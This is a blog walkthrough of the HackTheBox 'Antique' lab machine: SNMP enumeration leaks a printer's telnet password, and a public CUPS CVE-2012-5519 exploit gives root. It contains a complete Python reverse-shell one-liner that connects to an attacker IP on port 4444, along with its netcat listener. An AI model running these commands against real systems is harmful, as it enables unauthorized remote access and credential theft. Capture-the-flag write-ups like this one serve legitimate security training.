HTB : Antique writeup

Antique machine HTB

Antique is an easy level machine and the second challenge in the printer exploitation track.

Enumeration
Starting with the usual nmap scan we get the following

1
2
3
4
5
6
┌──(kali㉿kali)-[~/htb/tracks/Printer-Exploitation/Antique]
└─$ nmap -sC -sV 10.129.254.15
...
PORT STATE SERVICE VERSION
23/tcp open telnet?

The Telnet service is accessible, but it requires further investigation.
Next, let’s perform a UDP scan to check for any open UDP services.

1
2
3
4
5
┌──(kali㉿kali)-[~/htb/tracks/Printer-Exploitation/Antique]
└─$ nmap -sU 10.129.254.15
...
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server (public)

The Simple Network Management Protocol (SNMP) is running on the target machine. This protocol is often used for network monitoring and device management. let’s go ahead and enumerate that !

SNMP Enumeration

Let’s enumerate the SNMP service for useful information using Metasploit. Fire up msfconsole and search for SNMP enumeration modules:
image
From the list, I chose module 7 (auxiliary/scanner/snmp/snmp_enum) to proceed but unfortunately, no significant information was retrieved from scan. So, I will go back to investigate the open telnet port.

Investigating Telnet
Since the SNMP scan didn’t yield results, we return to the Telnet service.
image
Using Telnet to connect reveals that a password is required. However, we also observe the following device information, its name HP JetDirect.
This indicates the target is likely a printer device. A quick search for known vulnerabilities related to HP JetDirect reveals several CVEs.

Clicking the first link of CVEDetails.com and going through CVEs, this one matches our case.
image
I looked it up on exploit db and found a description of the attack vector.
image
However the tool used in this example is an exe and it’s written in java for linux aswell.

This blog is not a safe place for java.

Exploiting SNMP for Password Retrieval
A quick search for ‘SNMP tools that send get requests’ I came across snmpget which is pre built in kali linux.
image
And we did recieve the encoded device password, we can quickly decode that in out terminal !

1
2
3
4
5
┌──(kali㉿kali)-[~/htb/tracks/Printer-Exploitation/Antique]
└─$ echo "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135 " | xxd -r -p

P@ssw0rd@123!!123�q��"2Rbs3CSs��$4�Eu�WGW�(8i IY�aA�"1&1A5

Connecting via Telnet
Now that we have the password, we connect to the Telnet service
image
After logging in, we can execute commands using the exec syntax. To gain shell access, I used a reverse shell payload:

Payload:

1
2
exec python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.120",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("sh")'

But before we do that we have to set up our listener by simply typing
rlwrap nc -lvnp 4444
image

& that’s it! we’re in!

Before getting into PrvEsc let us upgrade our shell with python for better interactivity.
image
Privilege Escalation

At first I tried putting a rev-shell in the telnet.py file in a hope of it getting executed as root, it didn’t.

I also ran < $ ps aux > to display all running processes but I didn’t find anything interesting aswell.

Then I went to check that are running on the server with < $ netstat -nat >

image
As we can see there is a listener running locally on port 631, let’s curl that and see what we get.
image
Hm, our target server is running on CUPS/1.6, another quick search for CUPS/1.6 cve the first link was a github repo for the exploit of https://github.com/p1ckzi/CVE-2012-5519.

We’re almost there yay!

Next I got cloned the repo and started my python server so I can upload the sh file.

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/…/tracks/Printer-Exploitation/Antique/CVE-2012-5519]
└─$ ls
cups-root-file-read.sh README.md

┌──(kali㉿kali)-[~/…/tracks/Printer-Exploitation/Antique/CVE-2012-5519]
└─$ python3 -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

image
now let’s give the file excution permession with < $ chmod +x cups.sh > and then run it.
image
That’s it :) we owned the box yay! :D.


HTB : Antique writeup
https://stortny.github.io/blog/2024/12/28/HackTheBox-Antique-writeup/
Author
stortny
Posted on
December 28, 2024
Licensed under